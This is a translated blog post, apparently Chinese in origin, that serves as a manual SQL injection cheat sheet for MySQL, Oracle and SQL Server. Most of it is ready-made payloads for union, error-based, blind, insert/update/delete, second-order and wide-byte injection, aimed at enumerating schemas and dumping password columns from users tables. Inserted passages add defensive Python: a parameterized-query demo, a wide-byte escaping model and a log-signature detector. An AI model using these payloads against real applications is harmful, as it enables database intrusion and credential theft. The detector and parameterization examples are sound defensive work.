The most complete manual SQL injection summary on the net! (This one is enough for my collection!) There are plenty of SQL injection write-ups on the Internet, but in the WAF era manual injection is still very important in many real-world situations. This article is mainly a summary written to consolidate what I have learned; it does not explain each point in detail and is meant as a quick reference, like a lookup table, for later review. The content may contain mistakes; corrections from experts are welcome!

0x01 MySQL manual injection

1.1 Union injection

?id=1' order by 4--+

?id=0' union select 1,2,3,database()--+

?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()--+

?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="users"--+
#group_concat(column_name) can be replaced with unhex(hex(cast(column_name+as+char)))

?id=0 union select 1,2,3,group_concat(password) from users--+
#or group_concat(',',id,users,password)

?id=0' union select 1,2,3,password from users limit 0,1--+

1.2 Error injection

1. floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2. extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3. updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4. geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5. multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6. polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7. multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8. linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9. multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10. exp()
select * from test where id=1 and exp(~(select * from(select user())a));

Each error-based statement has its own principle:

exp() is a mathematical function that computes e to the power x; when the argument is greater than 709 the result overflows and MySQL raises an error.

updatexml() error: the second argument of updatexml() must be an XPath expression. A string beginning with ~ is not valid XPath syntax, and concat() is a string concatenation function, so the argument clearly violates the rule; MySQL then reports the offending value (the result of the expression inside the parentheses) in the error message, which is what makes error-based injection possible.

Dump database names: ?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1)--+

Dump table names: ?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1)--+

Dump column names: ?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1)--+

Dump data: ?id=1 and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1)--+

updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)

Note that because the ~ delimiters are concatenated onto the value, only 31 characters of an md5 value can be shown at once, so the value has to be split with a substring function:

substr(string string, num start, num length);

#string is the string, start is the starting position, and length is the number of characters

?id=1' and updatexml(1,concat(0x7e,substr((select password from users limit 1,1),1,16),0x7e),1)--+

1.3 Blind injection

1.3.1 Time-based blind injection

Time-based blind injection, also called delayed injection, usually uses the sleep() or benchmark() functions. A Cartesian product can also be used, but try to avoid it: with many rows it becomes extremely slow.

Time-based blind injection generally also needs a conditional function:

#if(expr1, expr2, expr3)

expr2 is returned when expr1 is true, and expr3 is returned when expr1 is false.

substr, substring, left

We usually encode the extracted character, although this is not required; it lets us avoid quotes, so ascii(), hex() and similar functions are used.

?id=1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))--+

?id=1' and if((substr((select user()),1,1)='r'),sleep(5),1)--+

1.3.2 Boolean blind injection

?id=1 and substr((select user()),1,1)='r'--+

?id=1' and ifnull((substr((select user()),1,1)='r'),0)--+

ifnull(): if the expression in the first parameter is NULL, the fallback value in the second parameter is returned; if it is not NULL, the expression's own value is returned.

?id=1' and strcmp((substr((select user()),1,1)='r'),1)--+

strcmp() returns 0 if the two strings are identical, -1 if the first argument is smaller than the second according to the current collation, and 1 otherwise.
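As an added illustration that is not part of the original post, the following Python script shows the boolean oracle behind the probes in 1.3.2 on a constructed SQLite table, beside the parameterized form that neutralizes it. SQLite has no user(), so sqlite_version() stands in for it; the users table, its rows and the function names lookup_vulnerable, lookup_parameterized and demo are assumptions made for this example.

```python
import sqlite3

# Constructed in-memory database standing in for the "users" table the
# page queries; the rows are invented for the demonstration.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("1", "admin", "admin"), ("2", "guest", "guest")])
    return conn

def lookup_vulnerable(conn, user_id):
    # String concatenation: the supplied value becomes part of the SQL text,
    # so a quote inside it terminates the literal and the remainder is parsed
    # as SQL. The injected condition now decides whether a row comes back.
    sql = f"SELECT username FROM users WHERE id='{user_id}'"
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterized(conn, user_id):
    # Parameter binding: the value travels separately from the statement and
    # is only ever compared as data, whatever characters it contains.
    sql = "SELECT username FROM users WHERE id=?"
    return [row[0] for row in conn.execute(sql, (user_id,))]

# Boolean-blind probes in the shape of section 1.3.2 (constructed here).
# sqlite_version() always starts with "3", so the first condition is true
# and the second is false.
TRUE_PROBE = "1' AND substr(sqlite_version(),1,1)='3' --"
FALSE_PROBE = "1' AND substr(sqlite_version(),1,1)='9' --"

def demo():
    conn = make_db()
    return {
        # concatenated query: the row appears only when the condition holds
        "vuln_true": lookup_vulnerable(conn, TRUE_PROBE),
        "vuln_false": lookup_vulnerable(conn, FALSE_PROBE),
        # bound parameter: the probe is just an id that matches nothing
        "param_true": lookup_parameterized(conn, TRUE_PROBE),
        "param_false": lookup_parameterized(conn, FALSE_PROBE),
        "param_normal": lookup_parameterized(conn, "1"),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The difference between vuln_true and vuln_false is the one-bit oracle that a boolean-blind attack reads; with binding, both probes return nothing because the whole string is compared against the id column.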

1.4 insert, delete, update

Injection into insert, delete and update statements mainly relies on blind and error-based techniques. Tools such as sqlmap are not recommended on such injection points, because they generate a lot of junk data. These injection points usually appear where data is written: registration forms, IP headers, message boards and so on. When no error is reported they are generally hard to find. To test, try inserting a single quote, a double quote or the escape character \ so that the statement fails to execute properly; if the insert or update then fails, test further to confirm whether there is an injection.

1.4.1 Error injection

mysql> insert into admin (id,username,password) values (2,"or updatexml(1,concat(0x7e,(version())),0) or","admin");
Query OK, 1 row affected (0.00 sec)

mysql> select * from admin;
+------+-----------------------------------------------+----------+
| id   | username                                      | password |
+------+-----------------------------------------------+----------+
|    1 | admin                                         | admin    |
|    1 | and 1=1                                       | admin    |
|    2 | or updatexml(1,concat(0x7e,(version())),0) or | admin    |
+------+-----------------------------------------------+----------+
3 rows in set (0.00 sec)

mysql> insert into admin (id,username,password) values (2,""or updatexml(1,concat(0x7e,(version())),0) or"","admin");
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'

delete (or 1=1 form):

mysql> delete from admin where id=-2 or updatexml(1,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'

1.4.2 Blind injection

#for an int column, operators such as +, -, *, /, and, or, xor and shifts can be used

mysql> insert into admin values (2+if((substr((select user()),1,1)='r'),sleep(5),1),'1',"admin");
Query OK, 1 row affected (5.00 sec)

mysql> insert into admin values (2+if((substr((select user()),1,1)='p'),sleep(5),1),'1',"admin");
Query OK, 1 row affected (0.00 sec)

mysql> insert into admin values (2,''+if((substr((select user()),1,1)='p'),sleep(5),1)+'',"admin");
Query OK, 1 row affected (0.00 sec)

mysql> insert into admin values (2,''+if((substr((select user()),1,1)='r'),sleep(5),1)+'',"admin");
Query OK, 1 row affected (5.01 sec)

In a delete statement the condition after or must evaluate to false, otherwise rows are actually deleted:

mysql> delete from admin where id=-2 or if((substr((select user()),1,1)='r4'),sleep(5),0);
Query OK, 0 rows affected (0.00 sec)

mysql> delete from admin where id=-2 or if((substr((select user()),1,1)='r'),sleep(5),0);
Query OK, 0 rows affected (5.00 sec)

mysql> select * from admin;
+------+----------+----------+
| id   | username | password |
+------+----------+----------+
|    2 | 1        | admin    |
|    2 | 1        | admin    |
|    2 | 1        | admin    |
|    2 | admin    | admin    |
+------+----------+----------+
4 rows in set (0.00 sec)

mysql> update admin set id="5"+sleep(5)+"" where id=2;
Query OK, 4 rows affected (20.00 sec)
Rows matched: 4  Changed: 4  Warnings: 0

1.5 Second-order injection and wide-byte injection

Second-order injection: in SQL statements where the value is not enclosed in single quotes, we can write it in hexadecimal so that no single quote appears at all.

mysql> insert into admin (id,name,pass) values ('3',0x61646d696e272d2d2b,'11');
Query OK, 1 row affected (0.00 sec)

mysql> select * from admin;
+----+-----------+-------+
| id | name      | pass  |
+----+-----------+-------+
|  1 | admin     | admin |
|  2 | admin'111 | 11111 |
|  3 | admin'--+ | 11    |
+----+-----------+-------+
4 rows in set (0.00 sec)

Second-order injection is hard to find without the source code. It is usually seen at registration: after a malicious account has been registered and logged in, the database may mistake the stored name admin'--+ for the admin account when that name is reused in a later query.

Wide-byte injection: escaping adds \ (encoded as %5c) before the quote. In a wide (double-byte) character set two bytes form one Chinese character, so putting %df in front of %5c turns the pair into the character 運 and the quote that follows is left unescaped.

id=-1%df' union select...

# without wide bytes: %27 -> %5c%27

# with wide bytes: %df%27 -> %df%5c%27 -> 運'
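Added example, not part of the original post: a byte-level Python model of the wide-byte problem just described. It assumes a GBK connection, a naive addslashes-style escaper that works on raw bytes, and, as the contrast, an escaper that decodes with the connection charset before touching anything; escape_bytes, escape_charset_aware, server_sees and demo are names invented here.

```python
def escape_bytes(raw: bytes) -> bytes:
    # Naive addslashes-style escaping: works byte by byte and knows nothing
    # about multibyte character sets. Backslashes are doubled first so the
    # ones added for quotes are not escaped again.
    return (raw.replace(b"\\", b"\\\\")
               .replace(b"'", b"\\'")
               .replace(b'"', b'\\"'))

def escape_charset_aware(raw: bytes, charset: str = "gbk") -> bytes:
    # Decode with the connection charset first so escaping happens on whole
    # characters. A lone lead byte followed by a quote is not a valid GBK
    # sequence, so such input is rejected instead of being glued to the
    # backslash later on.
    text = raw.decode(charset)  # raises UnicodeDecodeError on b"\xdf'"
    text = (text.replace("\\", "\\\\")
                .replace("'", "\\'")
                .replace('"', '\\"'))
    return text.encode(charset)

def server_sees(escaped: bytes, charset: str = "gbk") -> str:
    # What a connection using the given charset makes of the escaped bytes.
    return escaped.decode(charset)

def demo() -> dict:
    plain = b"'"       # %27, constructed input
    wide = b"\xdf'"    # %df%27, constructed input
    results = {
        "plain_escaped": escape_bytes(plain),             # b"\\'"
        "plain_decoded": server_sees(escape_bytes(plain)),  # backslash survives
        "wide_escaped": escape_bytes(wide),               # b"\xdf\\'"
        # %df%5c is consumed as one two-byte character, leaving a bare quote
        "wide_decoded": server_sees(escape_bytes(wide)),
    }
    try:
        escape_charset_aware(wide)
        results["aware_rejected"] = False
    except UnicodeDecodeError:
        results["aware_rejected"] = True
    return results

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, repr(value))
```

The point the page makes, that %df%5c decodes to 運, shows up as wide_decoded being a single character followed by an unescaped quote. The mitigation is to make escaping charset-aware (tell the client library the real connection charset, or avoid GBK-family charsets for the connection altogether) or, better, to bind parameters so that no escaping step exists to be bypassed.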

0x02 Oracle manual injection

2.1 Union injection

?id=-1' union select user,null from dual--

?id=-1' union select version,null from v$instance--

?id=-1' union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=3)--

?id=-1' union select column_name,null from (select * from (select rownum as limit,column_name from user_tab_columns where table_name='USERS') where limit=2)--

?id=-1' union select username,passwd from users--

?id=-1' union select username,passwd from (select * from (select username,passwd,rownum as limit from users) where limit=3)--

2.2 Error injection

?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))--

?id=1' and 1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like 'Oracle%'))--

?id=1' and 1=ctxsys.drithsx.sn(1,(select table_name from (select rownum as limit,table_name from user_tables) where limit=3))--

?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name='USERS') where limit=3))--

?id=1' and 1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))--

2.3 Blind injection

2.3.1 Boolean blind injection

Besides the rather verbose IF ... ELSE ... END IF construct, Oracle can also use decode(). Syntax: decode(condition, value 1, return value 1, value 2, return value 2, ..., value n, return value n, default);

The function means the following:

IF condition = value 1 THEN RETURN(return value 1)

ELSIF condition = value 2 THEN RETURN(return value 2) ......

ELSIF condition = value n THEN RETURN(return value n) ELSE RETURN(default) END IF

?id=1' and 1=(select decode(user,'SYSTEM',1,0,0) from dual)--

?id=1' and 1=(select decode(substr(user,1,1),'S',1,0,0) from dual)--

?id=1 and ascii(substr(user,1,1))>64--

2.3.2 Time-based blind injection

Time-based blind injection can use DBMS_PIPE.RECEIVE_MESSAGE('any value', delay time), whose second argument specifies the delay.

?id=1' and 1=(case when ascii(substr(user,1,1))>128 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--

?id=1' and 1=(case when ascii(substr(user,1,1))>64 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--

0x03 SQL Server manual injection

3.1 Union injection

?id=-1' union select null,null--

?id=-1' union select @@servername,@@version--

?id=-1' union select db_name(),suser_sname()--

?id=-1' union select (select top 1 name from sys.databases where name not in (select top 6 name from sys.databases)),null--

?id=-1' union select (select top 1 name from sys.databases where name not in (select top 7 name from sys.databases)),null--

?id=-1' union select (select top 1 table_name from information_schema.tables where table_name not in (select top 0 table_name from information_schema.tables)),null--

?id=-1' union select (select top 1 column_name from information_schema.columns where table_name='users' and column_name not in (select top 1 column_name from information_schema.columns where table_name='users')),null--

?id=-1' union select (select top 1 username from users where username not in (select top 3 username from users)),null--

3.2 Error injection

?id=1' and 1=(select 1/@@servername)--

?id=1' and 1=(select 1/(select top 1 name from sys.databases where name not in (select top 1 name from sys.databases)))--

3.3 Blind injection

3.3.1 Boolean blind injection

?id=1' and ascii(substring((select db_name(1)),1,1))>64--

3.3.2 Time-based blind injection

?id=1'; if(2>1) waitfor delay '0:0:5'--

?id=1'; if(ascii(substring((select db_name(1)),1,1))>64) waitfor delay '0:0:2'--
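Added example, not from the original post: a small detector that runs the payload families collected in this summary (order by / union select probing, the MySQL error-based functions, sleep() and benchmark(), DBMS_PIPE.RECEIVE_MESSAGE, ctxsys.drithsx.sn, waitfor delay, schema enumeration and a high byte placed directly before %27) over constructed Apache-style access log lines. The log lines, the signature names and the functions normalize, scan_line and scan are assumptions built for the demo; a production rule set would be tuned against real traffic and paired with response-time monitoring for the delay-based variants.

```python
import re
from urllib.parse import unquote_plus

# Signature families taken from the payloads in this summary (names invented).
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "mysql_error_fn": re.compile(
        r"\b(?:updatexml|extractvalue|exp|polygon|multipoint|multipolygon"
        r"|linestring|multilinestring|geometrycollection)\s*\(", re.I),
    "floor_rand": re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I),
    "mysql_delay": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "oracle_delay": re.compile(r"dbms_pipe\.receive_message", re.I),
    "oracle_error": re.compile(r"ctxsys\.drithsx\.sn", re.I),
    "mssql_delay": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "schema_probe": re.compile(
        r"information_schema\.|sys\.databases|user_tab(?:les|_columns)"
        r"|v\$(?:version|instance)", re.I),
}
# Checked on the raw (still percent-encoded) query string: a high byte right
# before an encoded quote is the shape of the %df%27 wide-byte trick.
WIDE_BYTE_RE = re.compile(r"%[89a-f][0-9a-f]%27", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def normalize(raw_query: str) -> str:
    """Percent-decode once, turn /**/ comments into spaces, collapse whitespace."""
    decoded = unquote_plus(raw_query).replace("/**/", " ")
    return re.sub(r"\s+", " ", decoded)

def scan_line(line: str) -> list:
    """Names of the signature families that match one access-log line."""
    match = REQUEST_RE.search(line)
    if not match or "?" not in match.group(1):
        return []
    raw_query = match.group(1).split("?", 1)[1]
    decoded = normalize(raw_query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    if WIDE_BYTE_RE.search(raw_query):
        hits.append("wide_byte_quote")
    return hits

def scan(lines) -> list:
    """(line index, hits) for every line that triggers at least one signature."""
    findings = []
    for index, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            findings.append((index, hits))
    return findings

# Constructed Apache combined-log style lines; not real traffic.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1%27%20order%20by%204--+ HTTP/1.1" 500 0',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=0%27%20union%20select%201,2,3,database()--+ HTTP/1.1" 200 640',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /item.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--+ HTTP/1.1" 500 0',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /item.php?id=1%27%20and%20if(ascii(substr(database(),1,1))>115,1,sleep(5))--+ HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /item.php?id=1%27;%20if(2>1)%20waitfor%20delay%20%270:0:5%27-- HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:07 +0000] "GET /item.php?id=-1%df%27%20union%20select%201,2,3--+ HTTP/1.1" 200 640',
    '10.0.0.9 - - [01/Jan/2024:10:00:08 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for index, hits in scan(LOG_LINES):
        print(index, hits)
```

The decode step matters: the sleep() and waitfor payloads only become visible after %20 and %27 are turned back into spaces and quotes, while the wide-byte check has to look at the raw bytes, because decoding erases the %df lead byte. The last line ("union station") is there as a benign control that the union rule must not flag.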
